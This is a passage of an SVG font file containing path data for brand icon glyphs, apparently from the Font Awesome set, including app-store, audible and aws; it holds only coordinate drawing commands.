c-3.10059 20.5996 -40.9004 4.59961 -43.1006 27.0996c-3.09961 32 43.7002 101.1 40 128c-3.39941 24 -19.3994 29.0996 -33.3994 29.4004c-13.4004 0.299805 -16.9004 -2 -21.4004 -4.60059c-2.89941 -1.7002 -6.59961 -4.89941 -11.7002 0.299805
c-6.2998 6 -11.0996 11.7002 -19.3994 12.9004c-12.2998 2 -17.7002 -2 -26.6006 -9.7002c-3.39941 -2.89941 -12 -12.8994 -20 -9.09961c-3.39941 1.7002 -15.3994 7.7002 -24 11.3994c-16.2998 7.10059 -40 -4.59961 -48.5996 -20
c-12.9004 -22.8994 -38 -113.1 -41.7002 -125.1c-8.59961 -26.5996 10.9004 -48.5996 36.9004 -47.0996c11.0996 0.599609 18.2998 4.59961 25.3994 17.3994c4 7.40039 41.7002 107.7 44.6006 112.601c2 3.39941 8.89941 8 14.5996 5.09961
c5.7002 -3.09961 6.90039 -9.40039 6 -15.0996c-1.09961 -9.7002 -28 -70.9004 -28.8994 -77.7002c-3.40039 -22.9004 26.8994 -26.6006 38.5996 -4c3.7002 7.09961 45.7002 92.5996 49.4004 98.2998c4.2998 6.2998 7.39941 8.2998 11.6992 8
c3.10059 0 8.30078 -0.900391 7.10059 -10.9004c-1.40039 -9.39941 -35.1006 -72.2998 -38.9004 -87.6992c-4.59961 -20.6006 6.60059 -41.4004 24.9004 -50.6006c11.3994 -5.7002 62.5 -15.7002 58.5 11.1006zM376.4 3.09961c10.5996 7.5 24.8994 4.60059 32.2998 -6
c7.09961 -10.5996 4.59961 -25.1992 -6 -32.5996c-10.6006 -7.09961 -24.9004 -4.59961 -32 6c-7.2002 10.5996 -4.60059 25.2002 5.7002 32.5996z" />
    <glyph glyph-name="font-awesome-alt" unicode="&#xf35c;" 
d="M339.3 276.8c5.40039 0 9.5 -3 7.7002 -7.09961v-134.4c0 -4.2002 -3 -6 -7.2002 -7.7998c-15.5996 -7.09961 -33.5 -13.7002 -52 -13.7002c-26.2998 0 -38.2002 16.1006 -69.2998 16.1006c-22.7002 0 -46 -8.30078 -65.7002 -16.7002
c-0.599609 -0.600586 -1.7998 -1.2002 -3 -1.2002v-44.2002c0 -1.7998 0 -3 -0.599609 -4.7998v-1.2998c-2.40039 -7.7002 -9.5 -13.7002 -18.5 -13.7002c-10.7002 0 -19.7002 8.90039 -19.7002 19.7002v212.1c-7.7002 6 -12.5 15.5 -12.5 25.7002
c0 18 14.2998 32.2998 32.2998 32.2998s32.2998 -14.3994 32.2998 -32.2998c0 -10.7998 -4.69922 -19.7002 -12.5 -25.7002v-17.8994c1.2002 0.599609 3 1.19922 4.80078 1.7998c17.8994 7.09961 39.3994 13.7002 59.6992 13.7002
c22.1006 0 39.4004 -5.90039 59.1006 -13.7002c4.09961 -1.7998 8.2998 -2.40039 12.5 -2.40039c22.7002 0 46.5996 15.5 52.5996 15.5zM397.8 416c27.5 0 50.2002 -22.7002 50.2002 -50.2002v-347.6c0 -27.5 -22.7002 -50.2002 -50.2002 -50.2002h-347.6
c-27.5 0 -50.2002 22.7002 -50.2002 50.2002v347.6c0 27.5 22.7002 50.2002 50.2002 50.2002h347.6zM412.1 18.2998v347.601c0 7.69922 -6.5 14.2998 -14.2998 14.2998v-0.100586h-347.6c-7.7002 0 -14.2998 -6.5 -14.2998 -14.2998v-347.5
c0 -7.7002 6.5 -14.2998 14.2998 -14.2998h347.6c7.7002 0 14.2998 6.5 14.2998 14.2998z" />
    <glyph glyph-name="accessible-icon" unicode="&#xf368;" 
d="M423.9 192.2l-12.9004 -157.3c-3.2998 -40.7002 -63.9004 -35.1006 -60.5996 4.89941l10 122.5l-41.1006 -2.2998c10.1006 -20.7002 15.7998 -43.9004 15.7998 -68.5c0 -41.2002 -16.0996 -78.7002 -42.2998 -106.5l-39.2998 39.2998
c57.9004 63.7002 13.0996 167.2 -74 167.2c-25.9004 0 -49.5 -9.90039 -67.2002 -26l-39.2998 39.2998c22 20.7002 50.0996 35.1006 81.4004 40.2002l75.2998 85.7002l-42.6006 24.7998l-51.5996 -46c-30 -26.7998 -70.5996 18.5 -40.5 45.4004l68 60.6992
c9.7998 8.80078 24.0996 10.2002 35.5 3.60059c0 0 139.3 -80.9004 139.5 -81.1006c16.2002 -10.0996 20.7002 -36 6.09961 -52.5996l-58.3994 -66.5l106.1 5.90039c18.5 1.09961 33.6006 -14.4004 32.1006 -32.7002zM359 346.2
c-28.0996 0 -50.9004 22.7998 -50.9004 50.8994c0 28.1006 22.8008 50.9004 50.9004 50.9004s50.9004 -22.7998 50.9004 -50.9004c0 -28.0996 -22.8008 -50.8994 -50.9004 -50.8994zM179.6 -8.5c20.8008 0 40.1006 6.40039 56.1006 17.2998l39.7002 -39.7002
c-100.7 -78.8994 -251.4 -8.19922 -251.4 122.5c0 36.1006 12.4004 69.4004 33.2002 95.7002l39.7002 -39.7002c-44.7002 -65.5 2.09961 -156.1 82.6992 -156.1z" />
    <glyph glyph-name="accusoft" unicode="&#xf369;" horiz-adv-x="640" 
d="M322.1 196c-1.69922 -1.59961 -89.5996 -82.5 -90.1992 -83.2998l-92.6006 -33.7998c-4.7998 -2 -7.59961 -3.7002 -7 -8.90039c0.200195 -1.5 0.600586 -22.5996 1 -27.7002c-0.700195 -0.5 -0.0996094 0 -0.599609 -0.599609c0 0 -113.7 -36.6006 -114.5 -36.6006
c-14.1006 -5.09961 -22.7002 -8.2998 -15.7002 1.7002c1.2998 1.7998 234.4 231.601 243.4 240.9c13 13.5 25 15.0996 25 15.0996l51.1992 -65.7998v-1zM482.2 75.9004c-5.7002 6.89941 -232.2 297.1 -239.9 306.6c-13.7002 17.2002 0 16.7998 19.2002 16.9004
c9.7002 0.0996094 106.3 0.599609 116.5 0.599609c24.0996 0.0996094 28.7002 -0.599609 38.4004 -12.7998c2.09961 -2.7002 205.1 -245.8 207.199 -248.3c5.5 -6.7002 15.2002 -19.1006 7.2002 -23.4004c-2.39941 -1.2998 -114.6 -47.7002 -117.8 -48.9004
c-10.0996 -4 -17.5 -6.7998 -30.7998 9.30078zM634.9 74.2998c6 -1.39941 7.09961 -4.2002 1.69922 -8.2002c-2 -1.39941 -123.699 -76.5996 -125.8 -77.7998c-15.0996 -8.7998 -38 -1.59961 -53.5996 1.7002c-7.10059 1.5 -305.3 68.2998 -308 69.0996
c-2.60059 0.900391 -4.40039 1 -4.60059 3.5c-0.299805 4 6 5.60059 11.1006 7.60059c5 1.89941 145.3 52.5996 150.2 54.7002c4.7998 2.09961 11.2998 2.69922 14.3994 2.89941c4.90039 0.299805 59.9004 -8.39941 65.2998 -9.2998l57.1006 -74
c9.7998 -11.4004 20.7002 -21.9004 36.7002 -14.5996c2.5 1.19922 117.5 51.5996 117.5 51.5996c13.3994 -2.5 35.6992 -6.90039 38 -7.2002z" />
    <glyph glyph-name="adversal" unicode="&#xf36a;" horiz-adv-x="512" 
d="M482.1 416c24.5 0 29.9004 -5.59961 29.9004 -30.2002v-388.1c0 -24.5 -5.5 -29.7002 -29.9004 -29.7002h-453.399c-22.9004 0 -28.7002 5.59961 -28.7002 28.9004v390.199c0 23 5.7998 28.9004 28.7002 28.9004h453.399zM178.4 227.7
c9.39941 -7.2002 12.3994 -17.1006 11.2998 -27.2998c-1.7998 -19.1006 -75.7998 -11.4004 -114 -30.9004c-27.2002 -13.9004 -42.7002 -41.7002 -39.6006 -71c6.7002 -64.7002 89.6006 -79.7002 147 -43.2998c4.60059 3.2002 8.30078 4.89941 11.9004 1
c2.09961 -2.60059 2 -4 3.90039 -6.2002c7.2998 -9.59961 38.1992 -14.0996 46.5996 -7.40039c3.09961 2.80078 4.59961 6.30078 2.7002 10.7002c-13.6006 30.5 -6.60059 63 -9.2998 88.7998c0 69.3008 6.39941 111.7 -34.5 128.5
c-41.9004 17.4004 -84.2002 16.6006 -125.301 -4.7998c-16.2998 -9 -53.6992 -52.8994 -24.8994 -64.2998c5.2998 -2.2998 12.7998 -4 22.5 -5.5c8.2002 -1.2002 13.2002 -2.7998 17.5 8.2998c12.0996 32.1006 56.7002 43.6006 84.2002 23.4004zM465.1 5.7002
c0 14.2998 -9.7998 9.89941 -16.5996 9.89941c-132.3 0.400391 -264.5 0.400391 -396.8 0c-6.60059 0 -16.7002 4.80078 -17.1006 -9.09961c-0.399414 -15.5 10.4004 -10.7002 17.8008 -10.7002h394.899c6.7002 0 17.7998 -5.2002 17.7998 9.90039zM468.9 346.2
c0 0.200195 0 0.299805 0.0996094 0.5c0 9.89941 -3.5 15.0996 -13.5996 14.2998c-3.10059 -0.400391 -6.60059 0 -9.7002 0c-26.1006 0 -26 0 -26 -26.2002v-71c-79.2002 45.6006 -124.3 -6.59961 -136.101 -30.5c-16.3994 -32.8994 -21.7998 -66.5996 -15.6992 -100
c16.2998 -92.2998 91 -114.899 144.399 -85.2002c4.60059 2.80078 6.60059 7.5 12.4004 -1.19922c8.59961 -12.7002 23.7002 -5.2002 36.0996 -5.60059c7.40039 0 8.10059 8.2002 8.10059 13.9004v291zM417.4 113.9c-19.5 -47.6006 -72.9004 -43.3008 -90 -5.2002
c-15.1006 33.2998 -15.5 68.2002 0.399414 101.5c16.2998 34.0996 59.7002 35.7002 81.5 4.7998c20.6006 -28.7998 14.9004 -84.5996 8.10059 -101.1zM122.6 78.5996c-7.5 1.30078 -33 3.30078 -33.6992 27.8008c-0.400391 13.8994 7.7998 23 19.7998 25.7998
c24.3994 5.89941 49.2998 9.89941 73.7002 14.7002c8.89941 2 7.39941 -4.40039 7.7998 -9.5c1.39941 -33 -26.1006 -59.2002 -67.6006 -58.8008z" />
    <glyph glyph-name="affiliatetheme" unicode="&#xf36b;" horiz-adv-x="511" 
d="M159.7 210.6c-51.2998 -70.8994 -116.601 -110.8 -145.7 -89.1992c-29.2002 21.6992 -11.2002 96.5996 40.2002 167.5c51.2998 70.8994 116.6 110.8 145.7 89.1992c29.0996 -21.5996 11.0996 -96.5996 -40.2002 -167.5zM510.9 267.9
c0.699219 -8.2002 1.09961 -16.5 1 -25c0 -151.801 -121.601 -274.9 -271.601 -274.9c-82.8994 0 -157.2 37.5996 -207 96.9004c71.2998 19.3994 130.5 68.3994 164.101 133.199c7.69922 -32.5996 24 -58.5996 49 -73.7998c72.5996 -44.0996 190.699 20.2002 264.5 143.601z
" />
    <glyph glyph-name="algolia" unicode="&#xf36c;" horiz-adv-x="447" 
d="M229.3 265.4c49.2002 0 89.2002 -39.9004 89.2002 -89.2002s-39.9004 -89.2002 -89.2002 -89.2002s-89.2002 39.9004 -89.2002 89.2002s39.9004 89.2002 89.2002 89.2002zM292 208.8c1.2998 0.700195 1.7998 2.40039 1.09961 3.7002
c-12.1992 21.4004 -34.8994 36.0996 -61.0996 37.0996c-1.40039 0.100586 -2.7002 -1.09961 -2.7002 -2.59961v-66.5c0 -1.90039 2 -3.2002 3.7998 -2.2998zM389.1 416c32.5 0 58.9004 -26.4004 58.8008 -58.9004v-330.199c0 -32.5 -26.3008 -58.9004 -58.9004 -58.9004
h-330.1c-32.5 0 -58.9004 26.4004 -58.9004 59v330.1c0 32.5 26.4004 58.9004 58.9004 58.9004h330.199zM186.5 331.3h0.0996094v-15.7998c0 -1.7002 1.7002 -3 3.40039 -2.5c12.7002 3.7002 25.9004 5.5 39.4004 5.5c13 0 25.7998 -1.7002 38.0996 -5.09961
c1.59961 -0.5 3.2998 0.699219 3.2998 2.5v15.3994c0 10.7998 -8.7002 19.5 -19.5 19.5h-45.2998c-10.7998 0 -19.5 -8.7002 -19.5 -19.5zM102.1 294.3c-7.59961 -7.59961 -7.59961 -19.8994 0 -27.3994l7.7002 -7.7002c1.10059 -1.2002 3 -1 4 0.299805
c4.40039 6.09961 9.40039 12 14.7998 17.4004c5.5 5.5 11.4004 10.3994 17.6006 14.8994c1.2998 1 1.39941 2.90039 0.299805 4l-7.7002 7.7002c-7.59961 7.59961 -19.8994 7.59961 -27.5 0zM229.3 49.5c69.9004 0 126.601 56.7998 126.601 126.6
c0 70 -56.6006 126.601 -126.601 126.601c-69.8994 0 -126.6 -56.7002 -126.6 -126.601c0 -69.8994 56.5996 -126.6 126.6 -126.6z" />
    <glyph glyph-name="amilia" unicode="&#xf36d;" 
d="M240.1 416c134.101 0 191.9 -55.7002 192 -136v-296.6c0 -3 -1 -8.10059 -5.09961 -9.10059c-4 -1 -57.2998 -0.700195 -66.5 -0.700195s-56.7998 1 -59.9004 2c-4 0.900391 -6.09961 6.10059 -6.09961 9.10059v25.3994
c-39.5996 -21.3994 -105.5 -42.0996 -153.3 -42.0996c-109.7 0 -124.9 85.7002 -124.9 104s-5.09961 95.5 30.4004 111.8c31.5 13.2002 156.3 36.5 243.7 47.7998v38.5c0 44.7002 -1 73.1006 -58.9004 73.1006c-55.7998 0 -119.8 -25.4004 -152.3 -47.7002
c-6.10059 -4.09961 -16.2002 -4.09961 -20.2998 6.09961c-5.10059 12.2002 -9.10059 34.5 -10.2002 39.6006c-1.90039 10.2002 2.09961 16.2998 7.2002 19.3994c52.6992 38.5 122.3 55.4004 184.199 55.4004zM290.3 68v106.7c-44.7002 -4.10059 -95.5 -20.2998 -119.8 -33.5
c-21.2998 -10.2002 -18.2998 -40.7002 -18.2998 -52.9004c0.0996094 -11.2002 6.2002 -44.7002 59 -44.7002c30.3994 0 57.7002 11.2002 79.0996 24.4004z" />
    <glyph glyph-name="angrycreative" unicode="&#xf36e;" horiz-adv-x="640" 
d="M640 209.8l-3.2002 -28.2002l-34.5 -2.2998l-2 -18.0996l34.5 2.2998l-3.2002 -28.2002l-34.3994 -2.2002l-2.2998 -20.0996l34.3994 2.2002l-3 -26.1006l-64.7002 -4.09961l12.7002 113.2l-47.2998 -115.4l-31.9004 -2l-23.7998 117.8l30.2998 2l13.6006 -79.3994
l31.7002 82.3994zM426.8 76.5l12.7998 120l28.4004 1.90039l-12.9004 -120.101zM162 59.9004l-19.4004 36l-3.5 -37.4004l-28.1992 -1.7002l2.69922 29.1006c-11 -18 -32 -34.3008 -56.8994 -35.8008c-32.7998 -2 -59.7002 20.9004 -56.4004 58.2002
c2.60059 29.2998 26.7002 62.7998 67.5 65.4004c37.7002 2.39941 47.6006 -23.2002 51.2998 -28.7998l2.80078 30.7998l38.8994 2.5c20.1006 1.2998 38.7002 -3.7002 42.5 -23.7002l2.60059 26.5996l64.7998 4.2002l-2.7002 -27.8994l-36.4004 -2.40039l-1.69922 -17.9004
l36.3994 2.30078l-2.7002 -27.9004l-36.3994 -2.2998l-1.90039 -19.9004l36.2998 2.2998l-2.09961 -20.7998l55 117.2l23.7998 1.59961l32.1006 -110.6l8.89941 85.5996l-22.2998 -1.39941l2.90039 27.8994l75 4.90039l-3 -28l-24.3008 -1.59961l-9.69922 -91.9004
l-58 -3.7002l-4.30078 15.6006l-39.3994 -2.5l-8 -16.3008zM117.7 130.1l-26.4004 -1.69922c-6.7002 12.3994 -14.3994 16.5996 -26.2998 15.7998c-19 -1.2002 -33.2998 -17.5 -34.5996 -33.2998c-1.40039 -16 7.2998 -32.5 28.6992 -31.2002
c12.8008 0.799805 21.3008 8.59961 28.9004 18.8994l27 1.7002zM173.8 137.8c1.2002 12.9004 -7.59961 13.6006 -26.0996 12.4004l-2.7002 -28.5c14.2002 0.899414 27.5 2.09961 28.7998 16.0996zM194.9 67l5.7998 60c-5 -13.5 -14.7002 -21.0996 -27.9004 -26.5996z
M330.3 112l-7.89941 37.7998l-15.8008 -39.2998zM160.2 186.6l-4.2998 17.5l-39.6006 -2.59961l-8.09961 -18.2002l-31.9004 -2.09961l57 121.899l23.9004 1.60059l30.7002 -102l9.89941 104.7l27 1.7998l37.7998 -63.6006l6.5 66.6006l28.5 1.89941l-4 -41.1992
c7.40039 13.5 22.9004 44.6992 63.6006 47.5c40.5 2.7998 52.3994 -29.3008 53.3994 -30.3008l3.30078 32l39.2998 2.7002c12.7002 0.900391 27.7998 -0.299805 36.2998 -9.7002l-4.40039 11.9004l32.2002 2.2002l12.9004 -43.2002l23 45.7002l31 2.2002l-43.6006 -78.4004
l-4.7998 -44.2998l-28.3994 -1.90039l4.7998 44.2998l-15.7998 43c1 -22.2998 -9.2002 -40.0996 -32 -49.5996l25.1992 -38.7998l-36.3994 -2.40039l-19.2002 36.7998l-4 -38.2998l-28.4004 -1.89941l3.30078 31.5c-6.7002 -9.30078 -19.7002 -35.4004 -59.6006 -38
c-26.2002 -1.7002 -45.5996 10.2998 -55.3994 39.1992l-4 -40.2998l-25 -1.59961l-37.6006 63.2998l-6.2998 -66.2002zM436.8 268.7c10.2002 0.700195 17.5 2.09961 21.6006 4.2998c4.5 2.40039 7 6.40039 7.59961 12.0996
c0.599609 5.30078 -0.599609 8.80078 -3.40039 10.4004c-3.59961 2.09961 -10.5996 2.7998 -22.8994 2zM327.7 234c5.59961 -5.90039 12.7002 -8.5 21.2998 -7.90039c4.7002 0.300781 9.09961 1.80078 13.2998 4.10059c5.5 3 10.6006 8 15.1006 14.2998l-34.2002 -2.2998
l2.39941 23.8994l63.1006 4.30078l1.2002 12l-31.2002 -2.10059c-4.10059 3.7002 -7.7998 6.60059 -11.1006 8.10059c-4 1.69922 -8.09961 2.7998 -12.1992 2.5c-8 -0.5 -15.3008 -3.60059 -22 -9.2002c-7.7002 -6.40039 -12 -14.5 -12.9004 -24.4004
c-1.09961 -9.59961 1.40039 -17.2998 7.2002 -23.2998zM126.4 225.8l23.7998 1.60059l-8.2998 37.5996z" />
    <glyph glyph-name="app-store" unicode="&#xf36f;" horiz-adv-x="512" 
d="M255.9 327.1l9.09961 15.7002c5.59961 9.7998 18.0996 13.1006 27.9004 7.5c9.7998 -5.59961 13.0996 -18.0996 7.5 -27.8994l-87.5 -151.5h63.2998c20.5 0 32 -24.1006 23.0996 -40.8008h-185.5c-11.2998 0 -20.3994 9.10059 -20.3994 20.4004
s9.09961 20.4004 20.3994 20.4004h52l66.6006 115.399l-20.8008 36.1006c-5.59961 9.7998 -2.2998 22.1992 7.5 27.8994c9.80078 5.60059 22.2002 2.2998 27.9004 -7.5zM177.2 109.1l-19.6006 -34c-5.59961 -9.7998 -18.0996 -13.0996 -27.8994 -7.5
c-9.7998 5.60059 -13.1006 18.1006 -7.5 27.9004l14.5996 25.2002c16.4004 5.09961 29.7998 1.2002 40.4004 -11.6006zM346.1 170.8h53.1006c11.2998 0 20.3994 -9.09961 20.3994 -20.3994c0 -11.3008 -9.09961 -20.4004 -20.3994 -20.4004h-29.5l19.8994 -34.5
c5.60059 -9.7998 2.30078 -22.2002 -7.5 -27.9004c-9.7998 -5.59961 -22.1992 -2.2998 -27.8994 7.5c-33.5 58.1006 -58.7002 101.601 -75.4004 130.601c-17.0996 29.5 -4.89941 59.0996 7.2002 69.0996c13.4004 -23 33.4004 -57.7002 60.0996 -104zM256 440
c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM472 192c0 119.9 -97.2998 216 -216 216c-119.9 0 -216 -97.2998 -216 -216c0 -119.9 97.2998 -216 216 -216c119.9 0 216 97.2998 216 216z" />
    <glyph glyph-name="app-store-ios" unicode="&#xf370;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM127 63.5l19.2998 33.2998c-10.2998 12.5 -23.5 16.2998 -39.5996 11.4004l-14.2998 -24.7002
c-5.5 -9.5 -2.30078 -21.7998 7.2998 -27.2998c9.5 -5.5 21.7998 -2.2998 27.2998 7.2998zM265.9 117.4c8.7998 16.2998 -2.5 40 -22.7002 40h-62.1006l85.8008 148.6c5.5 9.5 2.2998 21.7998 -7.30078 27.2998c-9.5 5.5 -21.7998 2.2998 -27.2998 -7.2998
l-8.89941 -15.4004l-8.90039 15.4004c-5.5 9.5 -17.7002 12.7998 -27.2998 7.2998c-9.5 -5.5 -12.7998 -17.7002 -7.2998 -27.2998l20.5 -35.4004l-65.4004 -113.199h-51c-11 0 -20 -9 -20 -20s9 -20 20 -20h181.9zM364 117.4c11 0 20 8.89941 20 20c0 11 -9 20 -20 20h-52
c-26.2002 45.2998 -45.7998 79.2998 -58.9004 102c-11.8994 -9.80078 -23.7998 -38.8008 -7.09961 -67.8008c16.5 -28.3994 41.0996 -71.1992 74 -128.1c5.5 -9.5 17.7002 -12.7998 27.2998 -7.2998c9.5 5.5 12.7998 17.7002 7.2998 27.2998l-19.5996 33.9004h29z" />
    <glyph glyph-name="apper" unicode="&#xf371;" horiz-adv-x="639" 
d="M42.0996 208.9c22.2002 0 29 -2.80078 33.5 -14.6006h0.800781v22.9004c0 11.2998 -4.80078 15.3994 -17.9004 15.3994c-11.2998 0 -14.4004 -2.5 -15.0996 -12.7998h-38.6006c0.299805 13.9004 1.5 19.1006 5.7998 24.4004
c7.30078 8.7998 18.9004 11.7998 46.1006 11.7998c33 0 47.0996 -5 53.8994 -18.9004c2 -4.2998 4 -15.5996 4 -23.6992v-76.3008h-38.2998l1.2998 19.1006h-1c-5.2998 -15.6006 -13.5996 -20.4004 -35.5 -20.4004c-30.2998 0 -41.0996 10.1006 -41.0996 37.2998
c0 25.2002 12.2998 35.8008 42.0996 35.8008zM59.2002 160.8c13.0996 0 16.8994 3 16.8994 13.4004c0 9.09961 -4.2998 11.5996 -19.5996 11.5996c-13.0996 0 -17.9004 -3 -17.9004 -12.0996c-0.0996094 -10.4004 3.7002 -12.9004 20.6006 -12.9004zM137 255.7h38.2998
l-1.5 -20.6006h0.799805c9.10059 17.1006 15.9004 20.9004 37.5 20.9004c14.4004 0 24.7002 -3 31.5 -9.09961c9.80078 -8.60059 12.8008 -20.4004 12.8008 -48.1006c0 -30 -3 -43.0996 -12.1006 -52.8994c-6.7998 -7.30078 -16.3994 -10.1006 -33.2002 -10.1006
c-20.3994 0 -29.1992 5.5 -33.7998 21.2002h-0.799805v-70.2998h-39.5v169zM217.9 195c0 27.5 -3.30078 32.5 -20.7002 32.5c-16.9004 0 -20.7002 -5 -20.7002 -28.7002c0 -28 3.5 -33.5 21.2002 -33.5c16.3994 0 20.2002 5.60059 20.2002 29.7002zM275.8 255.7h38.2998
l-1.5 -20.6006h0.800781c9.09961 17.1006 15.8994 20.9004 37.5 20.9004c14.3994 0 24.6992 -3 31.5 -9.09961c9.7998 -8.60059 12.7998 -20.4004 12.7998 -48.1006c0 -30 -3 -43.0996 -12.1006 -52.8994c-6.7998 -7.30078 -16.3994 -10.1006 -33.2998 -10.1006
c-20.3994 0 -29.2002 5.5 -33.7998 21.2002h-0.799805v-70.2998h-39.5v169h0.0996094zM356.7 195c0 27.5 -3.2998 32.5 -20.7002 32.5c-16.9004 0 -20.7002 -5 -20.7002 -28.7002c0 -28 3.5 -33.5 21.2002 -33.5c16.4004 0 20.2002 5.60059 20.2002 29.7002zM410.5 198.8
c0 25.4004 3.2998 37.7998 12.2998 45.7998c8.7998 8.10059 22.2002 11.3008 45.1006 11.3008c42.7998 0 55.6992 -12.8008 55.6992 -55.7002v-11.1006h-75.2998c-0.299805 -2 -0.299805 -4 -0.299805 -4.7998c0 -16.8994 4.5 -21.8994 20.0996 -21.8994
c13.9004 0 17.9004 3 17.9004 13.8994h37.5v-2.2998c0 -9.7998 -2.5 -18.9004 -6.7998 -24.7002c-7.2998 -9.7998 -19.6006 -13.5996 -44.2998 -13.5996c-27.5 0 -41.6006 3.2998 -50.6006 12.2998c-8.5 8.5 -11.2998 21.2998 -11.2998 50.7998zM486.9 210.4
c-0.300781 1.7998 -0.300781 3.2998 -0.300781 3.7998c0 12.2998 -3.2998 14.5996 -19.5996 14.5996c-14.4004 0 -17.0996 -3 -18.0996 -15.0996l-0.300781 -3.2998h38.3008zM542.5 255.7h38.2998l-1.7998 -19.9004h0.700195
c6.7998 14.9004 14.3994 20.2002 29.7002 20.2002c10.7998 0 19.0996 -3.2998 23.3994 -9.2998c5.2998 -7.2998 6.7998 -14.4004 6.7998 -34c0 -1.5 0 -5 0.200195 -9.2998h-35c0.299805 1.7998 0.299805 3.2998 0.299805 4c0 15.3994 -2 19.3994 -10.2998 19.3994
c-6.2998 0 -10.7998 -3.2998 -13.0996 -9.2998c-1 -3 -1 -4.2998 -1 -12.2998v-68h-38.2998v118.5h0.0996094z" />
    <glyph glyph-name="asymmetrik" unicode="&#xf372;" horiz-adv-x="576" 
d="M517.5 138.8c-13.9004 -14.2998 -30.4004 -27.7002 -48.9004 -39.7998l73.4004 -110.4h-101.6l-45.9004 71.8008c-17.5996 -7.2002 -35.9004 -13.4004 -54.5 -18.7002l32.5996 -53.1006h-135.5l22.8008 37.1006c-23.3008 -2.7002 -46.4004 -3.7002 -68.6006 -2.7002
l-22 -34.4004h-101.6l34.5 51.7002c-45 17.9004 -68.9004 47.9004 -68.4004 83c0.299805 25.7998 14 54.2998 41.7002 82.9004c38.9004 40 96.5 72.5996 161.6 92.8994c-22.2998 -8.09961 -42 -18.5 -62 -30.6992c-31.1992 -16.2002 -58.6992 -35.9004 -79.5 -58.1006
c-57.3994 -61 -46.5 -121.8 19.1006 -151.2l190.2 285.5l150.899 -226.399c13 9.5 24.7998 19.7998 35 30.5996c98 104.2 53.7002 207.9 -98.7998 231.7c-68.2998 10.5996 -146.8 5.7002 -221.3 -14.7998c-60.1006 -10 -118.7 -31.7002 -170.7 -58.2002
c118.1 66.9004 277.9 102.1 406.6 82.4004c110 -16.8008 170.2 -69.5 169.4 -135c-0.400391 -36.1006 -19.7002 -76.1006 -58.5 -116.101zM329.9 58.2998c18.3994 5.2998 36.5 11.7998 53.6992 19.2002l-78.6992 123l-101.9 -159.3
c22.5 -0.700195 45.7998 0.899414 69.2002 4.39941l32.7002 53.3008z" />
    <glyph glyph-name="audible" unicode="&#xf373;" horiz-adv-x="640" 
d="M640 248.1v-54l-320 -200l-320 199.9v54l320 -200zM445.5 176.1c-70.7998 94.4004 -200.5 110.7 -290.2 36.3008c-2.59961 -2.2002 -5.2002 -4.40039 -7.7002 -6.7002h-0.299805c37.1006 55.7002 100.601 92.3994 172.601 92.3994s135.5 -36.7998 172.699 -92.5996z
M225.4 157.3c21 29.6006 55.5 49 94.3994 49c39.2002 0 73.9004 -19.5996 94.7998 -49.5l-45.3994 -28.3994c-21.2002 29.1992 -52 47.5996 -86.4004 47.5996c-20.8994 0 -40.5 -6.7998 -57.3994 -18.7002zM103.6 286.9c-11.5 -9.10059 -24.2998 -22.1006 -34.1992 -32.6006
c53.8994 82.1006 147 135.601 250.5 135.601c104.899 0 197.199 -54 250.699 -135.7l-48.7998 -30.4004l-0.700195 1c-99.2998 138.5 -285.699 166.4 -417.5 62.1006zM570.6 254.2z" />
    <glyph glyph-name="avianex" unicode="&#xf374;" horiz-adv-x="512" 
d="M453.1 416c39 0 64.8008 -31.2002 57.8008 -69.7998l-56.7002 -308.5c-7.10059 -38.5 -44.4004 -69.7002 -83.2998 -69.7002h-312c-39 0 -64.8008 31.2002 -57.7002 69.7002l56.5996 308.6c7.10059 38.5 44.4004 69.7002 83.2998 69.7002h312zM394.9 68.7002
l6.2998 7.89941l-94.9004 119.4l-4.5 7.2998c19.7998 14.2002 33.5 24.2998 35.2998 25.6006c7.90039 6.59961 6.30078 20.7998 -2.69922 31.2998c-9.2002 10.7998 -23 14.3994 -30.7002 7.89941c0 0 -14.4004 -13.5996 -33.7998 -32.3994l-4.90039 4.5l-103.1 112.399
l-8.90039 -4.7998l-18.7998 -28.8994l68.7998 -99.8008l20.5 -29.5996c-12 -12.2998 -23.5 -24.4004 -32.7998 -34.9004l-58 31.1006l-15.7002 -15.4004l52.4004 -48.0996l40.5996 -61l17.9004 12.7002l-22.1006 64.1992c12.5 7.60059 27 17.1006 41.7002 27.1006
l115.4 -110z" />
    <glyph glyph-name="aws" unicode="&#xf375;" horiz-adv-x="640" 
d="M180.41 244.99c-0.719727 -22.6504 10.5996 -32.6807 10.8799 -39.0498c-0.238281 -2.31543 -2.0752 -5.12402 -4.09961 -6.27051l-12.8008 -8.95996c-1.39941 -0.981445 -3.92188 -1.8418 -5.62988 -1.91992c-0.429688 0.0195312 -8.18945 -1.83008 -20.4795 25.6104
c-13.0283 -16.2627 -40.5127 -29.4609 -61.3496 -29.4609c-0.347656 0 -0.913086 0.00488281 -1.26074 0.0107422c-16.2803 -0.890625 -60.4004 9.24023 -58.1299 56.21c-1.58984 38.2803 34.0596 62.0596 70.9297 60.0498
c7.10059 -0.0195312 21.6006 -0.370117 46.9902 -6.26953v15.6191c2.69043 26.46 -14.7002 46.9902 -44.8096 43.9102c-2.40039 -0.00976562 -19.4004 0.5 -45.8408 -10.1094c-7.35938 -3.37988 -8.2998 -2.82031 -10.75 -2.82031
c-7.40918 0 -4.35938 21.4795 -2.93945 24.2002c5.20996 6.39941 35.8604 18.3496 65.9395 18.1797c1.86523 0.165039 4.89844 0.298828 6.77148 0.298828c15.2451 0 37.1611 -7.875 48.9189 -17.5791c9.87305 -11.0439 17.8867 -32.0303 17.8867 -46.8438
c0 -1.52539 -0.0966797 -3.99609 -0.216797 -5.51562zM93.9902 212.6c32.4297 0.470703 46.1602 19.9707 49.29 30.4707c2.45996 10.0498 2.0498 16.4102 2.0498 27.3994c-9.66992 2.32031 -23.5898 4.85059 -39.5605 4.87012
c-15.1494 1.14062 -42.8193 -5.62988 -41.7393 -32.2598c-1.24023 -16.79 11.1201 -31.4004 29.96 -30.4805zM264.91 189.55c-7.86035 -0.719727 -11.5205 4.86035 -12.6797 10.3701l-49.8008 164.65c-0.969727 2.7793 -1.60938 5.64941 -1.91992 8.58008
